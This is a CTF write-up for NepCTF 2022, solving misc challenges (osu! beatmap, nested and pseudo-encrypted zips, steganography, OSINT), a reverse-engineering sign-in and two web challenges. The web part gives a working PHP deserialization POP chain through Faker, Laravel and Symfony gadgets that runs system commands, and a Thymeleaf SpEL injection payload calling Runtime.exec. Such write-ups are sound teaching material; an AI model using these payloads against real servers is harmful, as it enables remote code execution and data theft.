NepCTF 2022
misc
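花花画画画花花 (Huahua Draws and Draws)
Huahua drew a picture. Can you tell what she drew?
The attachment turns out to be an .osz file, a compressed beatmap archive for osu!. Install osu! and drag the attachment into it.

Launch osu!, enter edit mode, and step through the beatmap a little at a time. Here is a screenshot.

Finally, piece the parts together to get the flag: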
NepCTF{MASTER_OF_坏女人!}
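签到题 (Sign-in challenge)
Extreme nesting dolls
The attachment is a set of nested archives. The first version released got stuck halfway through the nesting; the organizers later lowered the difficulty, and the new attachment is workable: it is just simple nesting.

The extraction script is as follows: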
```python
import re
import zipfile

# Outermost archive and the directory every layer is extracted into
zipname = "C:\\Users\\25963\\Desktop\\新\\xxx\\232\\231\\" + "230.zip"
outdir = "D:\\developer\\python_shell\\zip"

while True:
    if zipname.endswith(".zip"):
        with zipfile.ZipFile(zipname) as pzip:
            inner = pzip.namelist()[0]
            # The leading digits of the inner file name are used as the password
            res = re.search('[0-9]*', inner)
            print(res.group())
            password = res.group().encode('ascii')
            pzip.extractall(outdir, pwd=password)
        zipname = outdir + "\\" + inner
    else:
        # The extracted file is no longer a zip: unpacking is finished
        print("end")
        break
```

The final archive turns out to use pseudo-encryption; repair it directly with WinRAR.
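Pseudo-encryption means the ZIP headers have the "encrypted" bit set while the file data itself is not encrypted. As an added example (not part of the original write-up), the Python code below clears that bit in the central directory and local headers and confirms the result with a CRC check. It assumes a single-disk, non-ZIP64 archive; the function names and the sample archive are constructed for illustration.

```python
import io
import struct
import zipfile
import zlib

ENCRYPTED = 0x0001  # bit 0 of the ZIP general purpose bit flag

def clear_encryption_flags(data: bytes) -> bytes:
    """Clear the encrypted bit in each central directory entry and local header."""
    buf = bytearray(data)
    eocd = buf.rfind(b"PK\x05\x06")  # end of central directory record
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    total, _size, pos = struct.unpack_from("<HII", buf, eocd + 10)
    for _ in range(total):
        if buf[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("bad central directory entry")
        buf[pos + 8] &= ~ENCRYPTED & 0xFF  # flag low byte, central directory
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", buf, pos + 28)
        local, = struct.unpack_from("<I", buf, pos + 42)
        if buf[local:local + 4] == b"PK\x03\x04":
            buf[local + 6] &= ~ENCRYPTED & 0xFF  # flag low byte, local header
        pos += 46 + name_len + extra_len + comment_len
    return bytes(buf)

def is_pseudo_encrypted(data: bytes) -> bool:
    """True when entries are flagged encrypted yet pass the CRC check once unflagged."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if not any(i.flag_bits & ENCRYPTED for i in zf.infolist()):
            return False
    try:
        with zipfile.ZipFile(io.BytesIO(clear_encryption_flags(data))) as zf:
            return zf.testzip() is None
    except (zipfile.BadZipFile, zlib.error):
        return False  # the data really is encrypted, or the archive is corrupt

def make_sample() -> bytes:
    """Constructed sample: an ordinary zip with the encrypted bit set in both headers."""
    mem = io.BytesIO()
    with zipfile.ZipFile(mem, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.txt", "constructed sample content")
    buf = bytearray(mem.getvalue())
    cd, = struct.unpack_from("<I", buf, buf.rfind(b"PK\x05\x06") + 16)
    buf[cd + 8] |= ENCRYPTED  # central directory entry
    buf[6] |= ENCRYPTED       # local header of the first entry (offset 0)
    return bytes(buf)

if __name__ == "__main__":
    print(is_pseudo_encrypted(make_sample()))
```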

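Traffic analysis shows that the capture is USB traffic.
9点直播 (9 O'Clock Livestream)
Dutifully watch the livestream, listen to the challenge author explain how easy it all is, and then get the flag.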

NepCTF{bad_woman_nb!}
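少见的bbbbase (A Rarely Seen bbbbase)
The attachment is a JPG. Open it with Jphswin (no password) and export the base-encoded flag directly.

Base58-decoding it gives the plaintext flag: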
flag{Real_qiandao~}
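馅饼?陷阱! (Pie? Trap!)
Using the 东北饺子城 (Dongbei Dumpling City) clue, a Baidu Maps search shows that the bank in question is right across from it.

The bank is China Everbright Bank (光大银行):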
NepCTF{www.cebbank.com}
re
快来签到 (Come Sign In)
Download the attachment and open it in 32-bit IDA. After raising the maximum node count to 9999, the flag is visible.

NepCTF{welc0me_t0_nepctf}
web
Just Kidding


This is a deserialization vulnerability. The PoC is as follows:
```php
<?php

namespace Faker {
    class Generator {
        protected $providers = [];
        protected $formatters = [];
        function __construct() {
            $this->formatter = "dispatch";
            $this->formatters = 9999;
        }
    }
}

namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        public function __construct() {
            $this->event = "cat /flag";
            $this->events = new \Faker\Generator();
        }
    }
}

namespace Symfony\Component\Mime\Part {
    abstract class AbstractPart {
        private $headers = null;
    }

    class SMimePart extends AbstractPart {
        protected $_headers;
        public $h3rmesk1t;
        function __construct() {
            $this->_headers = ["dispatch" => "system"];
            $this->h3rmesk1t = new \Illuminate\Broadcasting\PendingBroadcast();
        }
    }
}

namespace {
    $pop = new \Symfony\Component\Mime\Part\SMimePart();
    $ser = preg_replace("/([^\{]*\{)(.*)(s:49.*)(\})/", "\\1\\3\\2\\4", serialize($pop));
    echo base64_encode(str_replace("i:9999", "R:2", $ser));
}
```

NepCTF{e3edfaa0-e66e-4c7b-8c0b-e1cde5c7c40a}
Challenger
Download the attachment and analyze the routes.

The payload is as follows:
```
eval?lang=__$%7Bnew java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("cat /flag").getInputStream()).next()%7D__::.x
```

/NepCTF{b2d6a9bf-4f90-4abc-b5ae-9c07c4439ca5}